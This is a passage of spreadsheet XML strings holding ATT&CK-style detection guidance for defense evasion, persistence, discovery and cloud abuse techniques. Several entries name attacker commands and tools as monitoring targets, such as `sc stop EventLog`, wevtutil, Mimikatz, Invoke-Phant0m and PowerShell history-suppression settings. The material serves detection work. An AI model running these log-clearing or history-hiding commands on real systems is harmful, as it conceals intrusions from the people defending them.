Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  
In Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.
Monitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled. </t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the &lt;code&gt;EngineVersion&lt;/code&gt; field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Monitor network data to detect cases where HTTP is used instead of HTTPS.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include &lt;code&gt;chmod +x&lt;/code&gt;, &lt;code&gt;chmod -R 755&lt;/code&gt;, and &lt;code&gt;chmod 777&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques) 
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform.  Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t xml:space="preserve">Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. </t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. 
Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity. </t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.
Adversaries may rename abusable binaries to evade detections, but the argument &lt;code&gt;INJECTRUNNING&lt;/code&gt; is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t>Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as &lt;code&gt;Blob&lt;/code&gt;, &lt;code&gt;msSaveOrOpenBlob&lt;/code&gt;, and/or &lt;code&gt;download&lt;/code&gt; may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.
Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t xml:space="preserve">
</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)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</si>
  <si>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</si>
  <si>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System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity.</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.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</si>
  <si>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In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</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</si>
  <si>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language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. </t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt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t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
In Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Review all jobs using the &lt;code&gt;atq&lt;/code&gt; command and ensure IP addresses stored in the &lt;code&gt;SSH_CONNECTION&lt;/code&gt; and &lt;code&gt;SSH_CLIENT&lt;/code&gt; variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in &lt;code&gt;/var/spool/cron/atjobs/&lt;/code&gt;.(Citation: rowland linux at 2019)
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008).</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line &lt;code&gt;launchctl&lt;/code&gt; command. Plist files are located in the root, system, and users &lt;code&gt;/Library/LaunchAgents&lt;/code&gt; or &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folders. 
